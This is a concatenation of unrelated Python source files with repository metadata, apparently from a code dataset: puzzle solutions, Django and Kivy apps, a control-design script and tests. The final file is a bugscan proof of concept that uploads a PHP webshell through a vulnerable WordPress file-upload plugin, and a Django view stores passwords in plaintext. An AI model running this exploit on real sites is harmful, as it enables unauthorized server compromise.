fh = open(f_name, 'rt')
line = fh.readline()
test_cases = int(line)
result = ''
for i in xrange(1, test_cases+ 1):
line1 = fh.readline().replace('\n','')
line2 = fh.readline().replace('\n','')
repeat = int(line1.split(' ')[1])
string = ''
if len(line2) * repeat < 4:
string = str(line2) * repeat
if len(string) < 3:
result += 'Case #' + str(i) + ": NO\n"
continue
elif len(string) == 3:
if string == 'ijk':
result += 'Case #' + str(i ) + ": YES\n"
continue
else:
result += 'Case #' + str(i ) + ": NO\n"
continue
eval_str = evaluate_string(line2, repeat)
if eval_str == True:
result += 'Case #' + str( i ) + ": YES\n"
else:
result += 'Case #' + str(i ) + ": NO\n"
print result
fh.close()
f = open('saber_dijkstra.out', 'w')
f.write(result)
f.close()
main()
|
[
"eewestman@gmail.com"
] |
eewestman@gmail.com
|
03ee163b9ac703119f8282805997115dac007738
|
b6e5a79533b23404bf1582e9c66f4d1a9500b992
|
/backend/usa_2_go_27981/wsgi.py
|
067e6d4e56f68e483302e5793560ba8a17439f18
|
[] |
no_license
|
crowdbotics-apps/usa-2-go-27981
|
766add8314ebdeddfcc90ba2fe0185f66f247493
|
18ba1fa997814462fc7810b01c413cd7655c758b
|
refs/heads/master
| 2023-05-27T10:25:39.406088
| 2021-06-15T01:03:53
| 2021-06-15T01:03:53
| 376,992,929
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
"""
WSGI config for usa_2_go_27981 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "usa_2_go_27981.settings")
application = get_wsgi_application()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
fa02064419c1a25d7bb488b52884e661e606158d
|
24e390b6b3ac60baa5ee784cc017848e7e6e8426
|
/old_exercises/backup/plotlable.py
|
78c3ebcb682d03d9a38f071e66fad895ae411985
|
[] |
no_license
|
tertiarycourses/NumpySciPyTraining
|
6c83d91f7164e9cd3020fd987c55d15d93f2fcf3
|
0b45296cf07751938594973dd7fdc39d0daa04a1
|
refs/heads/master
| 2021-01-23T00:40:12.393829
| 2018-05-17T09:10:51
| 2018-05-17T09:10:51
| 92,831,280
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 173
|
py
|
import numpy
import matplotlib.pyplot as plt
x=numpy.linspace(0,2*numpy.pi,32)
plt.plot(x, numpy.sin(x))
plt.xlabel('x')
plt.ylabel('y')
plt.title('Sine Curve')
plt.show()
|
[
"angch@tertiaryinfotech.com"
] |
angch@tertiaryinfotech.com
|
9b0c90269a0a5ff5f89369b8ca2e2d59d97665fe
|
7c0acdc46cfce5dc116d394f6990ee5ab1c0fa0c
|
/venv/lib/python3.7/site-packages/buildsystem/setup.py
|
3e4ac13dece62dd1ea8f1f0ac6fe7d644541d600
|
[
"MIT"
] |
permissive
|
Vatansever27/ExchangeCode
|
84fb4a02371fdda7cd94d00971be76bcd1068be0
|
ab284653a337937139a9a28c036efe701fb376c7
|
refs/heads/master
| 2020-04-07T16:38:59.819929
| 2018-11-21T12:18:30
| 2018-11-21T12:18:30
| 158,537,067
| 0
| 0
| null | 2018-11-21T12:18:31
| 2018-11-21T11:22:14
| null |
UTF-8
|
Python
| false
| false
| 1,093
|
py
|
from .base import BaseBuilder, task
import os
class SetupBuilder(BaseBuilder):
setupdir = '.'
setupscript = None
product_title = 'Setup'
@task('compile_setup')
def do_compile_setup(self):
'''Compiles the Inno Setup Script `setupscript` into directory `setupdir` if `setupscript` is specified and exists.
`setupscript` has to be defined based on the directory `setupdir`.'''
if self.setupscript and os.path.exists(os.path.join(self.setupdir, self.setupscript)):
d = os.getcwd()
os.chdir(self.setupdir)
# write version information into git.txt
with open('git.txt', 'w') as f:
f.write(self.version)
# run setup
self.run([r'C:\Program Files (x86)\Inno Setup 5\ISCC.exe', self.setupscript])
# remove git.txt
os.remove('git.txt')
os.chdir(d)
else:
raise Exception('Setup script does not exist: %s' % os.path.join(self.setupdir, self.setupscript))
|
[
"doguhan@puentedev.io"
] |
doguhan@puentedev.io
|
c88e91b305ed920b0d4f97c56d7ec0ebf48c216c
|
20c67cd43a484819b13cb120f145def9bc1317d8
|
/usermage/views.py
|
d3063cfebd5ca6ec7725f323504b5493b4885c36
|
[] |
no_license
|
totota/trade
|
03c019f92df8846f47a1cee2a1c2b16fbcb5a50c
|
b690d51f05316d0b6f4cdcb01806ad79d3c1f4be
|
refs/heads/master
| 2021-09-02T06:43:49.175307
| 2017-10-16T11:04:01
| 2017-10-16T11:04:01
| 108,209,337
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,379
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import HttpResponseRedirect,HttpResponse
from django.shortcuts import render
from .forms import registeruser,loginform
from dms.models import city,location,security,campus,user,commodity,collection,indent,delegation,delegation_order
def adduser(request):
if request.method=='POST':
form=registeruser(request.POST)
print form
print 'post'
if form.is_valid():
print type(user.objects.filter(username=form.cleaned_data['username']))
if form.cleaned_data['password'] ==form.cleaned_data['ageinpassword']:
print 'password is right'
else:
#print "password error"
information='ok'
return HttpResponse(information)
if user.objects.filter(username=form.cleaned_data['username']):
    #print "duplicate username"
    information='username already exists'
return render(request,'usermas/regins.html',{'information':information})
if campus.objects.filter(name='default'):
default=campus.objects.get(name='default')
#print 'have default'
else:
default=campus(name='default')
default.save()
#print 'no default'
if location.objects.filter(extra='default'):
defaultlocation=location.objects.get(extra='default')
#print 'have default'
else:
defaultcity=city(province='default',country='default',cityname='default')
defaultcity.save()
defaultlocation=location(extra='default',cityid=defaultcity)
defaultlocation.save()
#print 'no default'
uniquequery=request.POST.get('unique','null')
mysecurity=security(password=form.cleaned_data['password'],tel=form.cleaned_data['phone'],email=form.cleaned_data['email'])
mysecurity.save()
myuser=user(username=form.cleaned_data['username'],age=0,unique=uniquequery,security_id=mysecurity,campus_id=default,addressid=defaultlocation,locationid=defaultlocation)
myuser.save()
information='save ok'
return HttpResponse(information)
else:
   return HttpResponse('error')
else:
return render(request,'usermas/regins.html')
#return HttpResponse('error')
def login(request):
if request.method=='POST':
form=loginform(request.POST)
if form.is_valid():
print 'rrr'
myuser=user.objects.filter(username__exact=form.cleaned_data['username'],security_id__password__exact=form.cleaned_data['password'])
if myuser:
    information='welcome '+form.cleaned_data['username']
return HttpResponse(information)
else:
information='password or username error'
return render(request,'usermas/login.html',{'information':information})
else:
   print 'ssss'
   information='invalid form'
return render(request,'usermas/login.html',{'information':information})
else:
return render(request,'usermas/login.html')
# Create your views here.
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
12ffc04da6d5d1f0f1212995f33e58915d501bc0
|
a964f0f3f93a84d5195042d3c1bb2288e8b62161
|
/muddery/server/typeclasses/locked_exit.py
|
0451335dae27a4647d7d453f79f9d35569d9f04e
|
[
"BSD-3-Clause"
] |
permissive
|
nobodxbodon/muddery
|
474433791b75d2f2130e6b758fb3126e2d56230b
|
4b4c6c0dc5cc237a5df012a05ed260fad1a793a7
|
refs/heads/master
| 2023-06-19T19:28:39.252340
| 2021-07-14T15:07:47
| 2021-07-14T15:07:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,770
|
py
|
"""
Exits
Exits are connectors between Rooms. An exit always has a destination property
set and has a single command defined on itself with the same name as its key,
for allowing Characters to traverse the exit to its destination.
"""
from muddery.server.statements.statement_handler import STATEMENT_HANDLER
from muddery.server.utils.localized_strings_handler import _
from muddery.server.mappings.typeclass_set import TYPECLASS
class MudderyLockedExit(TYPECLASS("EXIT")):
"""
Characters must unlock these exits to pass it.
The view and commands of locked exits are different from unlocked exits.
"""
typeclass_key = "LOCKED_EXIT"
typeclass_name = _("Locked Exit", "typeclasses")
model_name = "exit_locks"
def after_data_loaded(self):
"""
        Set data_info to the object.
"""
super(MudderyLockedExit, self).after_data_loaded()
self.unlock_condition = getattr(self.system, "unlock_condition", "")
self.unlock_verb = getattr(self.system, "unlock_verb", "")
self.locked_desc = getattr(self.system, "locked_desc", "")
self.auto_unlock = getattr(self.system, "auto_unlock", False)
self.unlock_forever = getattr(self.system, "unlock_forever", True)
def at_before_traverse(self, traversing_object):
"""
Called just before an object uses this object to traverse to
another object (i.e. this object is a type of Exit)
Args:
traversing_object (Object): The object traversing us.
Notes:
The target destination should normally be available as
`self.destination`.
If this method returns False/None, the traverse is cancelled
before it is even started.
"""
if not super(MudderyLockedExit, self).at_before_traverse(traversing_object):
return False
        # Can only pass exits that have already been unlocked.
if traversing_object.is_exit_unlocked(self.get_data_key()):
if not self.unlock_forever:
# lock the exit again
traversing_object.lock_exit(self)
return True
if self.auto_unlock and self.can_unlock(traversing_object):
# Can unlock the exit automatically.
if self.unlock_forever:
# Unlock it.
traversing_object.unlock_exit(self)
return True
# Show the object's appearance.
appearance = self.get_appearance(traversing_object)
traversing_object.msg({"look_obj": appearance})
return False
def can_unlock(self, caller):
"""
Unlock an exit.
"""
        # Can only unlock exits whose conditions are matched.
return STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
def get_appearance(self, caller):
"""
This is a convenient hook for a 'look'
command to call.
"""
# Get name and description.
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
can_unlock = self.can_unlock(caller)
if self.auto_unlock and can_unlock:
if self.unlock_forever:
                # Automatically unlock the exit when a character looks at it.
caller.unlock_exit(self)
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
cmds = []
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock_exit", "args": self.dbref}]
info = {"dbref": self.dbref,
"name": self.name,
"desc": self.locked_desc,
"cmds": cmds}
return info
def get_available_commands(self, caller):
"""
This returns a list of available commands.
"args" must be a string without ' and ", usually it is self.dbref.
"""
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common commands.
return super(MudderyLockedExit, self).get_available_commands(caller)
cmds = []
can_unlock = STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock", "args": self.dbref}]
return cmds
|
[
"luyijun999@gmail.com"
] |
luyijun999@gmail.com
|
bffdd5605e70c0218027950b2a97ca075262aee1
|
66dead2e38d06f5ca06463d669515876f7eb1771
|
/{{cookiecutter.project_name}}/tests/test_server/test_urls.py
|
abb5b5626aa423ead2e752d00c266d5a31417071
|
[
"MIT"
] |
permissive
|
viktortat/wemake-django-template
|
349920117d008e545db162ea11c4235fdf4bf0df
|
991bbb8b34ed4b705d38080caa1ffa3893362520
|
refs/heads/master
| 2020-03-21T10:32:01.894036
| 2018-06-22T09:41:22
| 2018-06-22T09:41:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
# -*- coding: utf-8 -*-
def test_admin_unauthorized(client):
"""This test ensures that admin panel requires auth."""
response = client.get('/admin/')
assert response.status_code == 302
def test_admin_authorized(admin_client):
"""This test ensures that admin panel is accessible."""
response = admin_client.get('/admin/')
assert response.status_code == 200
def test_robots_txt(client):
"""This test ensures that `robots.txt` is accessible."""
response = client.get('/robots.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
def test_humans_txt(client):
"""This test ensures that `humans.txt` is accessible."""
response = client.get('/humans.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
|
[
"mail@sobolevn.me"
] |
mail@sobolevn.me
|
d2f8a19b3de851ef689fddf518cebea8c37b91ec
|
17fe32a70be82d9fd6c3268b840226b5567c8b29
|
/torchtuples/utils.py
|
bb86e8e2b7557ada3baedd86a27b975d4f3b2644
|
[
"MIT",
"BSD-2-Clause"
] |
permissive
|
georgehc/dksa
|
dbb7161a75b8206d3d469bb5b966ed7a0f84d86c
|
bcd9eab6c9ded47f5b166cf1351b06e26e0c8f90
|
refs/heads/master
| 2023-08-02T06:15:12.472386
| 2021-10-01T17:47:25
| 2021-10-01T17:47:25
| 282,355,975
| 11
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,855
|
py
|
import time
import random
import numpy as np
import torch
from torchtuples import tuplefy, TupleTree
def make_name_hash(name='', file_ending='.pt'):
year, month, day, hour, minute, second = time.localtime()[:6]
ascii_letters_digits = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
random_hash = ''.join(random.choices(ascii_letters_digits, k=20))
path = f"{name}_{year}-{month}-{day}_{hour}-{minute}-{second}_{random_hash}{file_ending}"
return path
class TimeLogger:
def __init__(self, start=None):
self.start = self.time() if start is None else start
self.prev = self.start
@staticmethod
def time():
return time.time()
def diff(self):
prev, self.prev = (self.prev, self.time())
return self.prev - self.start, self.prev - prev
@staticmethod
def _hms_from_sec(sec):
"""Hours, minutes, seconds."""
m, s = divmod(sec, 60)
h, m = divmod(m, 60)
return h, m, s
@staticmethod
def _hms_str(h, m, s, shorten=True):
"""Hours, minutes, seconds."""
hs = f"{int(h)}h:"
ms = f"{int(m)}m:"
ss = f"{int(s)}s"
if shorten:
if h == 0:
hs = ''
if m == 0:
ms = ''
return f"{hs}{ms}{ss}"
# return f"{int(h)}h:{int(m)}m:{int(s)}s"
def hms_diff(self, shorten=True):
diff_start, diff_prev = self.diff()
hms_start = self._hms_from_sec(diff_start)
hms_prev = self._hms_from_sec(diff_prev)
return self._hms_str(*hms_start, shorten), self._hms_str(*hms_prev, shorten)
def array_or_tensor(tensor, numpy, input):
    """Returns a tensor if `numpy` is False or the input is a tensor.
    Otherwise it returns a numpy array, even if the input is a DataLoader.
    """
is_tensor = None
if numpy is False:
is_tensor = True
elif (numpy is True) or is_dl(input):
is_tensor = False
elif not (is_data(input) or is_dl(input)):
raise ValueError(f"Do not understand type of `input`: {type(input)}")
elif tuplefy(input).type() is torch.Tensor:
is_tensor = True
elif tuplefy(input).type() is np.ndarray:
is_tensor = False
else:
raise ValueError("Something wrong")
if is_tensor:
tensor = tuplefy(tensor).to_tensor().val_if_single()
else:
tensor = tuplefy(tensor).to_numpy().val_if_single()
return tensor
def is_data(input):
"""Returns True if `input` is data of type tuple, list, TupleTree, np.array, torch.Tensor."""
datatypes = [np.ndarray, torch.Tensor, tuple, list, TupleTree]
return any([isinstance(input, ct) for ct in datatypes])
def is_dl(input):
"""Returns True if `input` is a DataLoader (inherit from DataLoader)."""
return isinstance(input, torch.utils.data.DataLoader)
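if __name__ == "__main__":
    # Small illustration of the helpers above (not part of the library API):
    print(make_name_hash("model"))  # e.g. model_<date>_<time>_<random hash>.pt
    logger = TimeLogger()
    time.sleep(0.2)
    since_start, since_prev = logger.hms_diff()
    print(since_start, since_prev)  # both roughly "0s" for such a short wait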
|
[
"georgechen@cmu.edu"
] |
georgechen@cmu.edu
|
8da334eb44c9ea9052929ef18f09fca3bede6dbe
|
65348a4305d10b88c3b4e34eb00d66cf5db6aba7
|
/main.py
|
225446846dea7cdde0668e429d65088b5214d266
|
[] |
no_license
|
lailacampos/Simple-GUI-Kivy
|
a3671b9dd7f39c6b1efb3c0521753a8a99f32fa8
|
19b0ed9ff7ad4039d842b2d4223a7d79ffb56dc2
|
refs/heads/main
| 2023-08-22T03:08:48.696503
| 2021-09-22T02:19:27
| 2021-09-22T02:19:27
| 407,191,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 773
|
py
|
# Useful links:
# https://kivy.org/doc/stable/guide/basic.html#quickstart
# https://kivy.org/doc/stable/api-kivy.app.html
# https://youtu.be/YDp73WjNISc
from kivy.app import App
from kivy.uix.label import Label
# The MyMainApp() class is derived from the App() class of the kivy.app repository.
# The App() class is the base for creating Kivy applications.
# Kivy requires that the class inherits from the App class
class MyApp(App):
    # The build() method initializes the application and returns the widget that will be used as the root and added to the window.
    # This method doesn't need to be called directly: App().run() will call it.
def build(self):
label = Label(text="Hello World")
return label
if __name__ == "__main__":
MyApp().run()
|
[
"enders.game1990@gmail.com"
] |
enders.game1990@gmail.com
|
4d3122b6a5a76c30a85ea82eef87b31bb9ff3d7f
|
9bcb5032d27ca321f489c035f7d46019ffdf4b85
|
/numericalFunctions/ptwXY/Python/Test/Flat/binaryMath/flatMath.py
|
46871d9e915089e2d32588a84b4438372de42ec5
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
LLNL/gidiplus
|
128ef4d4acbcb264e31794a535cd95e8c77d8a96
|
e1c6f0e4de51bc4d7616c5c4676b9818c4b9817c
|
refs/heads/master
| 2023-08-31T06:21:14.519577
| 2023-02-13T18:35:20
| 2023-02-13T18:35:20
| 187,251,526
| 10
| 3
|
NOASSERTION
| 2021-12-23T00:28:07
| 2019-05-17T16:48:24
|
C++
|
UTF-8
|
Python
| false
| false
| 5,300
|
py
|
# <<BEGIN-copyright>>
# Copyright 2019, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: MIT
# <<END-copyright>>
import os
from numericalFunctions import pointwiseXY_C
accuracy = 1e-2
biSectionMax = 0.
if( 'CHECKOPTIONS' in os.environ ) :
options = os.environ['CHECKOPTIONS'].split( )
if( '-e' in options ) : print( __file__ )
CPATH = '../../../../Test/Flat/binaryMath'
os.system( 'cd %s; make -s clean; ./flatMath -v > v' % CPATH )
def skipBlankLines( ls ) :
i = 0
for i, l in enumerate( ls ) :
if( l.strip( ) != '' ) : break
ls = ls[i:]
if( ( len( ls ) == 1 ) and ( ls[0].strip( ) == '' ) ) : ls = []
return( ls )
def getIntegerValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = int( ls[0].split( '=' )[1] )
return( ls[1:], value )
def getDoubleValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = float( ls[0].split( '=' )[1] )
return( ls[1:], value )
def compareValues( label, i, v1, v2 ) :
sv1, sv2 = '%.12e' % v1, '%.12e' % v2
sv1, sv2 = '%.7e' % float( sv1 ), '%.7e' % float( sv2 )
if( sv1 != sv2 ) : print( '<%s> <%s>' % ( sv1, sv2 ) )
if( sv1 != sv2 ) : raise Exception( '%s: values %e and %e diff by %e at %d for label = %s' % ( __file__, v1, v2, v2 - v1, i, label ) )
def getXYData( ls, biSectionMax, accuracy ) :
ls, length = getIntegerValue( 'length', ls )
data = [ list( map( float, ls[i].split( ) ) ) for i in range( length ) ]
data = pointwiseXY_C.pointwiseXY_C( data, initialSize = len( data ), overflowSize = 10, biSectionMax = biSectionMax, accuracy = accuracy, safeDivide = True, interpolation = "flat" )
ls = ls[length:]
ls = skipBlankLines( ls )
return( ls, data )
def getCommand( ls ) :
s = ls[0].split( )
if( len( s ) != 2 ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
if( s[0] != "#" ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
return( ls[1:], s[1] )
def compareXYs( XYs1, XYs2, label ) :
if( len( XYs1 ) != len( XYs2 ) ) : raise Exception( 'for %s: len( XYs1 ) = %s != len( XYs2 ) = %s' % ( label, len( XYs1 ), len( XYs2 ) ) )
for i, xy in enumerate( XYs1 ) :
compareValues( "x division " + label, count, xy[0], XYs2[i][0] )
compareValues( "y division " + label, count, xy[1], XYs2[i][1] )
def mathParse( count, ls ) :
ls, command = getCommand( ls )
if( command == 'double' ) :
ls = doubleCheck( count, ls )
elif( command == 'all_double' ) :
ls = allDoubleCheck( count, ls )
elif( command == 'binary_add_sub' ) :
ls = binaryAddSubCheck( count, ls )
elif( command == 'binary_mul_div' ) :
ls = binaryMulDivCheck( count, ls )
else :
raise Exception( 'Invalid command = "%s"' % command )
return( ls )
def doubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, o = getCommand( ls )
if( o not in '+-=*/\\' ) : raise Exception( 'Unknown operator "%s"' % o )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
if( o == '+' ) : results = XYs + d
elif( o == '-' ) : results = XYs - d
elif( o == '=' ) : results = d - XYs
elif( o == '*' ) : results = XYs * d
elif( o == '/' ) : results = XYs / d
elif( o == '\\' ) : results = d / XYs
compareXYs( resultsC, results, "doubleCheck %s" % o )
return( ls )
def allDoubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = ( ( d * ( XYs + d ) ) - d ) / d
results = ( ( ( d * results ) + d ) / d ) - d
compareXYs( resultsC, results, "allDoubleCheck" )
return( ls )
def binaryAddSubCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 + XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results - XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
return( ls )
def binaryMulDivCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 * XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results / XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
return( ls )
f = open( os.path.join( CPATH, 'v' ) )
ls = f.readlines( )
f.close( )
ls, accuracy = getDoubleValue( 'accuracy', ls )
count = 0
while( len( ls ) ) :
count += 1
ls = mathParse( count, ls )
|
[
"mattoon1@llnl.gov"
] |
mattoon1@llnl.gov
|
718209cd4e9b8129270bfd7cfce002ecbefdd48f
|
e49b654d3db99773390c5b9686df9c99fbf92b2a
|
/linked_lists/remove_nth_from_end.py
|
df9193a1a375cfc8ab394f07106bc5c85074e045
|
[] |
no_license
|
hao89/diary_of_programming_puzzles
|
467e8264d0ad38768ba5ac3cfb45301293d79943
|
0e05d3716f28075f99bbd7b433d16a383209e57c
|
refs/heads/master
| 2021-01-16T00:49:38.956102
| 2015-08-25T13:44:53
| 2015-08-25T13:44:53
| 41,692,587
| 1
| 0
| null | 2015-08-31T18:20:38
| 2015-08-31T18:20:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
"""
Given a linked list, remove the nth node from the end of the list and return
its head.
For example,
Given the linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes
1->2->3->5.
Note:
Given n will always be valid.
Try to do this in one pass
"""
# @param head a reference to the head of the list
# @param n the position (from the tail) of the node that should be deleted
# @return a new linked list with the required node deleted
def remove_nth_from_end(head, n):
n_behind_node = head
faster_node = head
before_behind_node = head
for i in xrange(0, n):
faster_node = faster_node.next
while faster_node:
faster_node = faster_node.next
before_behind_node = n_behind_node
n_behind_node = n_behind_node.next
# handle situation where there is only one node in the linked list or the
# head is the one being removed
if before_behind_node == n_behind_node:
if not n_behind_node.next:
head = None
else:
head = n_behind_node.next
else:
before_behind_node.next = before_behind_node.next.next
return head
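if __name__ == "__main__":
    # Minimal sketch for trying the function out; the module defines no node
    # type, so this ListNode class is purely illustrative.
    class ListNode(object):
        def __init__(self, value):
            self.value = value
            self.next = None
    head = ListNode(1)
    tail = head
    for value in [2, 3, 4, 5]:
        tail.next = ListNode(value)
        tail = tail.next
    head = remove_nth_from_end(head, 2)
    values = []
    while head:
        values.append(head.value)
        head = head.next
    print(values)  # expected: [1, 2, 3, 5]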
|
[
"me@davidadamojr.com"
] |
me@davidadamojr.com
|
ae5fa2cf162831595429963b02bdc5cfc7fb8baf
|
7e9daf6a2a3ebfb969e793f92afc0dc5f1c2fc35
|
/venv/bin/pip
|
f925d1739221b77a3093bdff330b2aded4106b0b
|
[] |
no_license
|
NARESHSWAMI199/5-Star-On-Hacker-Rank-Python
|
e43ce5cb3429d2a683c37e6f4ba6440d073d47c2
|
51f245d1d0966de21ddf861b22fe3379e7c8a0a7
|
refs/heads/main
| 2023-02-25T03:05:25.330205
| 2021-01-19T13:49:27
| 2021-01-19T13:49:27
| 325,296,957
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 256
|
#!/home/naresh/Documents/django/hrank/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"swaminaresh993@gmail.com"
] |
swaminaresh993@gmail.com
|
|
105ea887fde8976e0371b1515151cd874df939cd
|
39dc5f1ffa71ad5e7aab5e92bb118bddf3ddae44
|
/ats/users/urls.py
|
63a22a7046e3bb8a9decd34439b0530732abd1fc
|
[
"MIT"
] |
permissive
|
MahmoudFarid/ats
|
14422a136c574d33745ac874e02e2211cce8bf14
|
1f882168cba2f34451cbb9bba1e37ce93ef0c465
|
refs/heads/master
| 2023-08-28T09:08:49.860168
| 2020-07-28T20:35:00
| 2020-07-28T20:35:00
| 278,744,279
| 0
| 0
|
MIT
| 2021-11-12T15:22:34
| 2020-07-10T22:23:07
|
Python
|
UTF-8
|
Python
| false
| false
| 358
|
py
|
from django.urls import path
from ats.users.views import (
user_detail_view,
user_redirect_view,
user_update_view,
)
app_name = "users"
urlpatterns = [
path("~redirect/", view=user_redirect_view, name="redirect"),
path("~update/", view=user_update_view, name="update"),
path("<str:email>/", view=user_detail_view, name="detail"),
]
|
[
"mahmoud.farid.94@gmail.com"
] |
mahmoud.farid.94@gmail.com
|
21c2ff1c781282e130ce340af0483a9cecda2ee7
|
ced2fe3abf39bf14519feb809f5cd4e56c828b46
|
/notebooks/solution/control.py
|
1225ebf7d93259de25bc077dcf008f6d1f42287a
|
[
"CC-BY-4.0"
] |
permissive
|
nanounanue/pydy-tutorial-pycon-2014
|
f68fb8bb967f6229743151c023b0b6da50d46f24
|
9a111ada7478a16c41ab75253e631a400febb083
|
refs/heads/master
| 2020-12-25T16:25:38.826055
| 2014-06-20T14:54:37
| 2014-06-20T14:54:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,454
|
py
|
#!/usr/bin/env python
# Controller Design
from numpy import zeros, matrix, eye, dot, asarray
from numpy.linalg import inv
from scipy.linalg import solve_continuous_are
from .utils import controllable
from .visualization import *
equilibrium_point = zeros(len(coordinates + speeds))
equilibrium_dict = dict(zip(coordinates + speeds, equilibrium_point))
parameter_dict = dict(zip(constants, numerical_constants))
linear_state_matrix, linear_input_matrix, inputs = kane.linearize()
f_A_lin = linear_state_matrix.subs(parameter_dict).subs(equilibrium_dict)
f_B_lin = linear_input_matrix.subs(parameter_dict).subs(equilibrium_dict)
m_mat = mass_matrix.subs(parameter_dict).subs(equilibrium_dict)
A = matrix(m_mat.inv() * f_A_lin).astype(float)
B = matrix(m_mat.inv() * f_B_lin).astype(float)
assert controllable(A, B)
Q = matrix(eye(6))
R = matrix(eye(3))
S = solve_continuous_are(A, B, Q, R)
K = inv(R) * B.T * S
# This is an annoying little issue. We specified the order of things when
# creating the rhs function, but the linearize function returns the F_B
# matrix in the order corresponding to whatever order it finds the joint
# torques. This would also cause trouble if we specified an ordering of the
# coordinates and speeds different from the standard kane._q + kane._u
K = K[[0, 2, 1], :]
def controller(x, t):
return -asarray(dot(K, x)).flatten()
args['specified'] = controller
y = odeint(right_hand_side, x0, t, args=(args,))
|
[
"moorepants@gmail.com"
] |
moorepants@gmail.com
|
6b7b060513cf603782ed5bf499c61bedf4ab8776
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_602.py
|
9d51ac6e5eea714832eab404bedc4db5c96a7b00
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,189
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'tyq'
# Name: Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
# Refer: https://www.bugscan.net/#!/x/21599
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
path = "/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php"
payload = arg + path
filename = "Content-Disposition: backdoor.php"
shell = "<?php echo md5(123)?>"
code, head, res, _, _ = curl.curl('-H \'%s\' -d \'%s\' %s' % (filename, shell, payload))
uploadfile = 'wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php'
code, head, res, _, _ = curl.curl(arg + uploadfile)
if code == 200 and '202cb962ac59075b964b07152d234b70' in res:
security_hole("webshell url:%s" % (arg + uploadfile))
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://192.168.121.130/wordpress/')[1])
|
[
